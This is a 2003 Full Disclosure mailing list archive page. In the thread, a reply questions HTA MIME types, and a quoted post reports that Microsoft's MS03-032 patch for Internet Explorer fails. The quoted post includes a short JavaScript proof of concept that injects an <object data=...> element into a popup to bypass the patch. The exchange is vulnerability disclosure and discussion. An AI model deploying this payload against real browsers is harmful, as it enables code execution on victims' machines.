Full Disclosure mailing list archives
RE: BAD NEWS: Microsoft Security Bulletin MS03-032
From: "Richard M. Smith" <rms () computerbytesman com>
Date: Sun, 7 Sep 2003 14:38:13 -0400
Can this bug also be fixed by changing the MIME type of HTA files from "application/hta" to something else? If so, what other MIME types need to switched to avoid the <OBJECT DATA=>? Any thoughts why .HTA files have a MIME type in the first place? Richard -----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of http-equiv () excite com Sent: Sunday, September 07, 2003 9:17 AM To: full-disclosure () lists netsys com Subject: [Full-disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032 Since the cat somehow got out of the bag, and more importantly, this is so blatantly obvious, herewith is the "Bad News": The patch for Drew's object data=funky.hta doesn't work: http://www.malware.com/badnews.html <script> var oPopup = window.createPopup(); function showPopup() { oPopup.document.body.innerHTML = "<object data=ouch.php>"; oPopup.show(0,0,1,1,document.body); } showPopup() </script> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- BAD NEWS: Microsoft Security Bulletin MS03-032 http-equiv () excite com (Sep 07)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Richard M. Smith (Sep 07)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Richard M. Smith (Sep 07)
- Re: BAD NEWS: Microsoft Security Bulletin MS03-032 morning_wood (Sep 08)
- Re: BAD NEWS: Microsoft Security Bulletin MS03-032 http-equiv () excite com (Sep 08)
- Re: BAD NEWS: Microsoft Security Bulletin MS03-032 Fabio Gomes de Souza (Sep 08)
- <Possible follow-ups>
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Nick Jacobsen (Sep 07)
- FW: BAD NEWS: Microsoft Security Bulletin MS03-032 Richard M. Smith (Sep 07)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 GreyMagic Software (Sep 08)
- Re: [VulnWatch] RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Thomas Kristensen (Sep 08)
- RE: BAD NEWS: Microsoft Security Bulletin MS03-032 ADBecker (Sep 08)
- Re: RE: BAD NEWS: Microsoft Security Bulletin MS03-032 Nick FitzGerald (Sep 08)
(Thread continues...)